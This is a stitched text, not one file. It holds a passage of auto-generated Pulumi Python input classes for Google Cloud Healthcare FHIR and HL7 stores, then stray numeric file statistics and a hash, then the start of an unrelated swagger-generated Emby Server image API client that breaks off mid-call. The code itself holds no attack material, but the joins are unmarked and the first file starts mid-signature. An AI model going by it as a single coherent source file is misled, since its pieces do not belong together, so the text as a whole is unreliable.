Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class FhirStoreNotificationConfigArgs: def __init__(__self__, *, pubsub_topic: pulumi.Input[str]): """ :param pulumi.Input[str] pubsub_topic: The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ pulumi.set(__self__, "pubsub_topic", pubsub_topic) @property @pulumi.getter(name="pubsubTopic") def pubsub_topic(self) -> pulumi.Input[str]: """ The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ return pulumi.get(self, "pubsub_topic") @pubsub_topic.setter def pubsub_topic(self, value: pulumi.Input[str]): pulumi.set(self, "pubsub_topic", value) @pulumi.input_type class FhirStoreStreamConfigArgs: def __init__(__self__, *, bigquery_destination: pulumi.Input['FhirStoreStreamConfigBigqueryDestinationArgs'], resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None): """ :param pulumi.Input['FhirStoreStreamConfigBigqueryDestinationArgs'] bigquery_destination: The destination BigQuery structure that contains both the dataset location and corresponding schema config. The output is organized in one table per resource type. The server reuses the existing tables (if any) that are named after the resource types, e.g. "Patient", "Observation". When there is no existing table for a given resource type, the server attempts to create one. See the [streaming config reference](https://cloud.google.com/healthcare/docs/reference/rest/v1beta1/projects.locations.datasets.fhirStores#streamconfig) for more details. Structure is documented below. :param pulumi.Input[Sequence[pulumi.Input[str]]] resource_types: Supply a FHIR resource type (such as "Patient" or "Observation"). See https://www.hl7.org/fhir/valueset-resource-types.html for a list of all FHIR resource types. The server treats an empty list as an intent to stream all the supported resource types in this FHIR store. """ pulumi.set(__self__, "bigquery_destination", bigquery_destination) if resource_types is not None: pulumi.set(__self__, "resource_types", resource_types) @property @pulumi.getter(name="bigqueryDestination") def bigquery_destination(self) -> pulumi.Input['FhirStoreStreamConfigBigqueryDestinationArgs']: """ The destination BigQuery structure that contains both the dataset location and corresponding schema config. The output is organized in one table per resource type. The server reuses the existing tables (if any) that are named after the resource types, e.g. "Patient", "Observation". When there is no existing table for a given resource type, the server attempts to create one. See the [streaming config reference](https://cloud.google.com/healthcare/docs/reference/rest/v1beta1/projects.locations.datasets.fhirStores#streamconfig) for more details. Structure is documented below. """ return pulumi.get(self, "bigquery_destination") @bigquery_destination.setter def bigquery_destination(self, value: pulumi.Input['FhirStoreStreamConfigBigqueryDestinationArgs']): pulumi.set(self, "bigquery_destination", value) @property @pulumi.getter(name="resourceTypes") def resource_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ Supply a FHIR resource type (such as "Patient" or "Observation"). See https://www.hl7.org/fhir/valueset-resource-types.html for a list of all FHIR resource types. The server treats an empty list as an intent to stream all the supported resource types in this FHIR store. """ return pulumi.get(self, "resource_types") @resource_types.setter def resource_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "resource_types", value) @pulumi.input_type class FhirStoreStreamConfigBigqueryDestinationArgs: def __init__(__self__, *, dataset_uri: pulumi.Input[str], schema_config: pulumi.Input['FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs']): """ :param pulumi.Input[str] dataset_uri: BigQuery URI to a dataset, up to 2000 characters long, in the format bq://projectId.bqDatasetId :param pulumi.Input['FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs'] schema_config: The configuration for the exported BigQuery schema. Structure is documented below. """ pulumi.set(__self__, "dataset_uri", dataset_uri) pulumi.set(__self__, "schema_config", schema_config) @property @pulumi.getter(name="datasetUri") def dataset_uri(self) -> pulumi.Input[str]: """ BigQuery URI to a dataset, up to 2000 characters long, in the format bq://projectId.bqDatasetId """ return pulumi.get(self, "dataset_uri") @dataset_uri.setter def dataset_uri(self, value: pulumi.Input[str]): pulumi.set(self, "dataset_uri", value) @property @pulumi.getter(name="schemaConfig") def schema_config(self) -> pulumi.Input['FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs']: """ The configuration for the exported BigQuery schema. Structure is documented below. """ return pulumi.get(self, "schema_config") @schema_config.setter def schema_config(self, value: pulumi.Input['FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs']): pulumi.set(self, "schema_config", value) @pulumi.input_type class FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs: def __init__(__self__, *, recursive_structure_depth: pulumi.Input[int], schema_type: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[int] recursive_structure_depth: The depth for all recursive structures in the output analytics schema. For example, concept in the CodeSystem resource is a recursive structure; when the depth is 2, the CodeSystem table will have a column called concept.concept but not concept.concept.concept. If not specified or set to 0, the server will use the default value 2. The maximum depth allowed is 5. :param pulumi.Input[str] schema_type: Specifies the output schema type. Only ANALYTICS is supported at this time. * ANALYTICS: Analytics schema defined by the FHIR community. See https://github.com/FHIR/sql-on-fhir/blob/master/sql-on-fhir.md. Default value is `ANALYTICS`. Possible values are `ANALYTICS`. """ pulumi.set(__self__, "recursive_structure_depth", recursive_structure_depth) if schema_type is not None: pulumi.set(__self__, "schema_type", schema_type) @property @pulumi.getter(name="recursiveStructureDepth") def recursive_structure_depth(self) -> pulumi.Input[int]: """ The depth for all recursive structures in the output analytics schema. For example, concept in the CodeSystem resource is a recursive structure; when the depth is 2, the CodeSystem table will have a column called concept.concept but not concept.concept.concept. If not specified or set to 0, the server will use the default value 2. The maximum depth allowed is 5. """ return pulumi.get(self, "recursive_structure_depth") @recursive_structure_depth.setter def recursive_structure_depth(self, value: pulumi.Input[int]): pulumi.set(self, "recursive_structure_depth", value) @property @pulumi.getter(name="schemaType") def schema_type(self) -> Optional[pulumi.Input[str]]: """ Specifies the output schema type. Only ANALYTICS is supported at this time. * ANALYTICS: Analytics schema defined by the FHIR community. See https://github.com/FHIR/sql-on-fhir/blob/master/sql-on-fhir.md. Default value is `ANALYTICS`. Possible values are `ANALYTICS`. """ return pulumi.get(self, "schema_type") @schema_type.setter def schema_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "schema_type", value) @pulumi.input_type class Hl7StoreIamBindingConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class Hl7StoreIamMemberConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class Hl7StoreNotificationConfigArgs: def __init__(__self__, *, pubsub_topic: pulumi.Input[str]): """ :param pulumi.Input[str] pubsub_topic: The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ pulumi.set(__self__, "pubsub_topic", pubsub_topic) @property @pulumi.getter(name="pubsubTopic") def pubsub_topic(self) -> pulumi.Input[str]: """ The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ return pulumi.get(self, "pubsub_topic") @pubsub_topic.setter def pubsub_topic(self, value: pulumi.Input[str]): pulumi.set(self, "pubsub_topic", value) @pulumi.input_type class Hl7StoreNotificationConfigsArgs: def __init__(__self__, *, pubsub_topic: pulumi.Input[str], filter: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[str] pubsub_topic: The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. :param pulumi.Input[str] filter: Restricts notifications sent for messages matching a filter. If this is empty, all messages are matched. Syntax: https://cloud.google.com/appengine/docs/standard/python/search/query_strings Fields/functions available for filtering are: * messageType, from the MSH-9.1 field. For example, NOT messageType = "ADT". * send_date or sendDate, the YYYY-MM-DD date the message was sent in the dataset's timeZone, from the MSH-7 segment. For example, send_date < "2017-01-02". * sendTime, the timestamp when the message was sent, using the RFC3339 time format for comparisons, from the MSH-7 segment. For example, sendTime < "2017-01-02T00:00:00-05:00". * sendFacility, the care center that the message came from, from the MSH-4 segment. For example, sendFacility = "ABC". * PatientId(value, type), which matches if the message lists a patient having an ID of the given value and type in the PID-2, PID-3, or PID-4 segments. For example, PatientId("123456", "MRN"). * labels.x, a string value of the label with key x as set using the Message.labels map. For example, labels."priority"="high". The operator :* can be used to assert the existence of a label. For example, labels."priority":*. """ pulumi.set(__self__, "pubsub_topic", pubsub_topic) if filter is not None: pulumi.set(__self__, "filter", filter) @property @pulumi.getter(name="pubsubTopic") def pubsub_topic(self) -> pulumi.Input[str]: """ The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ return pulumi.get(self, "pubsub_topic") @pubsub_topic.setter def pubsub_topic(self, value: pulumi.Input[str]): pulumi.set(self, "pubsub_topic", value) @property @pulumi.getter def filter(self) -> Optional[pulumi.Input[str]]: """ Restricts notifications sent for messages matching a filter. If this is empty, all messages are matched. Syntax: https://cloud.google.com/appengine/docs/standard/python/search/query_strings Fields/functions available for filtering are: * messageType, from the MSH-9.1 field. For example, NOT messageType = "ADT". * send_date or sendDate, the YYYY-MM-DD date the message was sent in the dataset's timeZone, from the MSH-7 segment. For example, send_date < "2017-01-02". * sendTime, the timestamp when the message was sent, using the RFC3339 time format for comparisons, from the MSH-7 segment. For example, sendTime < "2017-01-02T00:00:00-05:00". * sendFacility, the care center that the message came from, from the MSH-4 segment. For example, sendFacility = "ABC". * PatientId(value, type), which matches if the message lists a patient having an ID of the given value and type in the PID-2, PID-3, or PID-4 segments. For example, PatientId("123456", "MRN"). * labels.x, a string value of the label with key x as set using the Message.labels map. For example, labels."priority"="high". The operator :* can be used to assert the existence of a label. For example, labels."priority":*. """ return pulumi.get(self, "filter") @filter.setter def filter(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "filter", value) @pulumi.input_type class Hl7StoreParserConfigArgs: def __init__(__self__, *, allow_null_header: Optional[pulumi.Input[bool]] = None, schema: Optional[pulumi.Input[str]] = None, segment_terminator: Optional[pulumi.Input[str]] = None, version: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[bool] allow_null_header: Determines whether messages with no header are allowed. :param pulumi.Input[str] schema: JSON encoded string for schemas used to parse messages in this store if schematized parsing is desired. :param pulumi.Input[str] segment_terminator: Byte(s) to be used as the segment terminator. If this is unset, '\r' will be used as segment terminator. A base64-encoded string. :param pulumi.Input[str] version: The version of the unschematized parser to be used when a custom `schema` is not set. Default value is `V1`. Possible values are `V1` and `V2`. """ if allow_null_header is not None: pulumi.set(__self__, "allow_null_header", allow_null_header) if schema is not None: pulumi.set(__self__, "schema", schema) if segment_terminator is not None: pulumi.set(__self__, "segment_terminator", segment_terminator) if version is not None: pulumi.set(__self__, "version", version) @property @pulumi.getter(name="allowNullHeader") def allow_null_header(self) -> Optional[pulumi.Input[bool]]: """ Determines whether messages with no header are allowed. """ return pulumi.get(self, "allow_null_header") @allow_null_header.setter def allow_null_header(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "allow_null_header", value) @property @pulumi.getter def schema(self) -> Optional[pulumi.Input[str]]: """ JSON encoded string for schemas used to parse messages in this store if schematized parsing is desired. """ return pulumi.get(self, "schema") @schema.setter def schema(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "schema", value) @property @pulumi.getter(name="segmentTerminator") def segment_terminator(self) -> Optional[pulumi.Input[str]]: """ Byte(s) to be used as the segment terminator. If this is unset, '\r' will be used as segment terminator. A base64-encoded string. """ return pulumi.get(self, "segment_terminator") @segment_terminator.setter def segment_terminator(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "segment_terminator", value) @property @pulumi.getter def version(self) -> Optional[pulumi.Input[str]]: """ The version of the unschematized parser to be used when a custom `schema` is not set. Default value is `V1`. Possible values are `V1` and `V2`. """ return pulumi.get(self, "version") @version.setter def version(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "version", value)
43.174883
239
0.676118
4,356
36,785
5.586547
0.082645
0.082268
0.079392
0.036696
0.85375
0.805137
0.79285
0.766879
0.756236
0.747606
0
0.004606
0.22675
36,785
851
240
43.225617
0.850935
0.365665
0
0.72296
1
0
0.125263
0.054565
0
0
0
0
0
1
0.216319
false
0
0.009488
0.056926
0.352941
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
9
40120208d780ce393f0ae7c0ce9afd903a17ab95
22,774
py
Python
embyapi/api/image_by_name_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
embyapi/api/image_by_name_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
embyapi/api/image_by_name_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
# coding: utf-8 """ Emby Server API Explore the Emby Server API # noqa: E501 OpenAPI spec version: 4.1.1.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from embyapi.api_client import ApiClient class ImageByNameServiceApi(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def get_images_general(self, **kwargs): # noqa: E501 """Gets all general images by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_general(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_general_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_images_general_with_http_info(**kwargs) # noqa: E501 return data def get_images_general_with_http_info(self, **kwargs): # noqa: E501 """Gets all general images by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_general_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. """ all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_general" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json', 'application/xml']) # noqa: E501 # Authentication setting auth_settings = ['apikeyauth', 'embyauth'] # noqa: E501 return self.api_client.call_api( '/Images/General', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[ImageByNameInfo]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_images_general_by_name_by_type(self, name, type, **kwargs): # noqa: E501 """Gets a general image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_general_by_name_by_type(name, type, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str type: Image Type (primary, backdrop, logo, etc). (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_general_by_name_by_type_with_http_info(name, type, **kwargs) # noqa: E501 else: (data) = self.get_images_general_by_name_by_type_with_http_info(name, type, **kwargs) # noqa: E501 return data def get_images_general_by_name_by_type_with_http_info(self, name, type, **kwargs): # noqa: E501 """Gets a general image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_general_by_name_by_type_with_http_info(name, type, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str type: Image Type (primary, backdrop, logo, etc). (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['name', 'type'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_general_by_name_by_type" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name' is set if ('name' not in params or params['name'] is None): raise ValueError("Missing the required parameter `name` when calling `get_images_general_by_name_by_type`") # noqa: E501 # verify the required parameter 'type' is set if ('type' not in params or params['type'] is None): raise ValueError("Missing the required parameter `type` when calling `get_images_general_by_name_by_type`") # noqa: E501 collection_formats = {} path_params = {} if 'name' in params: path_params['Name'] = params['name'] # noqa: E501 if 'type' in params: path_params['Type'] = params['type'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # Authentication setting auth_settings = [] # noqa: E501 return self.api_client.call_api( '/Images/General/{Name}/{Type}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_images_mediainfo(self, **kwargs): # noqa: E501 """Gets all media info image by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_mediainfo(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_mediainfo_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_images_mediainfo_with_http_info(**kwargs) # noqa: E501 return data def get_images_mediainfo_with_http_info(self, **kwargs): # noqa: E501 """Gets all media info image by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_mediainfo_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. """ all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_mediainfo" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json', 'application/xml']) # noqa: E501 # Authentication setting auth_settings = ['apikeyauth', 'embyauth'] # noqa: E501 return self.api_client.call_api( '/Images/MediaInfo', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[ImageByNameInfo]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_images_mediainfo_by_theme_by_name(self, name, theme, **kwargs): # noqa: E501 """Gets a media info image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_mediainfo_by_theme_by_name(name, theme, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str theme: The theme to get the image from (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_mediainfo_by_theme_by_name_with_http_info(name, theme, **kwargs) # noqa: E501 else: (data) = self.get_images_mediainfo_by_theme_by_name_with_http_info(name, theme, **kwargs) # noqa: E501 return data def get_images_mediainfo_by_theme_by_name_with_http_info(self, name, theme, **kwargs): # noqa: E501 """Gets a media info image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_mediainfo_by_theme_by_name_with_http_info(name, theme, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str theme: The theme to get the image from (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['name', 'theme'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_mediainfo_by_theme_by_name" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name' is set if ('name' not in params or params['name'] is None): raise ValueError("Missing the required parameter `name` when calling `get_images_mediainfo_by_theme_by_name`") # noqa: E501 # verify the required parameter 'theme' is set if ('theme' not in params or params['theme'] is None): raise ValueError("Missing the required parameter `theme` when calling `get_images_mediainfo_by_theme_by_name`") # noqa: E501 collection_formats = {} path_params = {} if 'name' in params: path_params['Name'] = params['name'] # noqa: E501 if 'theme' in params: path_params['Theme'] = params['theme'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # Authentication setting auth_settings = [] # noqa: E501 return self.api_client.call_api( '/Images/MediaInfo/{Theme}/{Name}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_images_ratings(self, **kwargs): # noqa: E501 """Gets all rating images by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_ratings(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_ratings_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_images_ratings_with_http_info(**kwargs) # noqa: E501 return data def get_images_ratings_with_http_info(self, **kwargs): # noqa: E501 """Gets all rating images by name # noqa: E501 Requires authentication as user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_ratings_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: list[ImageByNameInfo] If the method is called asynchronously, returns the request thread. """ all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_ratings" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json', 'application/xml']) # noqa: E501 # Authentication setting auth_settings = ['apikeyauth', 'embyauth'] # noqa: E501 return self.api_client.call_api( '/Images/Ratings', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[ImageByNameInfo]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_images_ratings_by_theme_by_name(self, name, theme, **kwargs): # noqa: E501 """Gets a rating image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_ratings_by_theme_by_name(name, theme, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str theme: The theme to get the image from (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_images_ratings_by_theme_by_name_with_http_info(name, theme, **kwargs) # noqa: E501 else: (data) = self.get_images_ratings_by_theme_by_name_with_http_info(name, theme, **kwargs) # noqa: E501 return data def get_images_ratings_by_theme_by_name_with_http_info(self, name, theme, **kwargs): # noqa: E501 """Gets a rating image by name # noqa: E501 No authentication required # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_images_ratings_by_theme_by_name_with_http_info(name, theme, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the image (required) :param str theme: The theme to get the image from (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['name', 'theme'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_images_ratings_by_theme_by_name" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name' is set if ('name' not in params or params['name'] is None): raise ValueError("Missing the required parameter `name` when calling `get_images_ratings_by_theme_by_name`") # noqa: E501 # verify the required parameter 'theme' is set if ('theme' not in params or params['theme'] is None): raise ValueError("Missing the required parameter `theme` when calling `get_images_ratings_by_theme_by_name`") # noqa: E501 collection_formats = {} path_params = {} if 'name' in params: path_params['Name'] = params['name'] # noqa: E501 if 'theme' in params: path_params['Theme'] = params['theme'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # Authentication setting auth_settings = [] # noqa: E501 return self.api_client.call_api( '/Images/Ratings/{Theme}/{Name}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, # noqa: E501 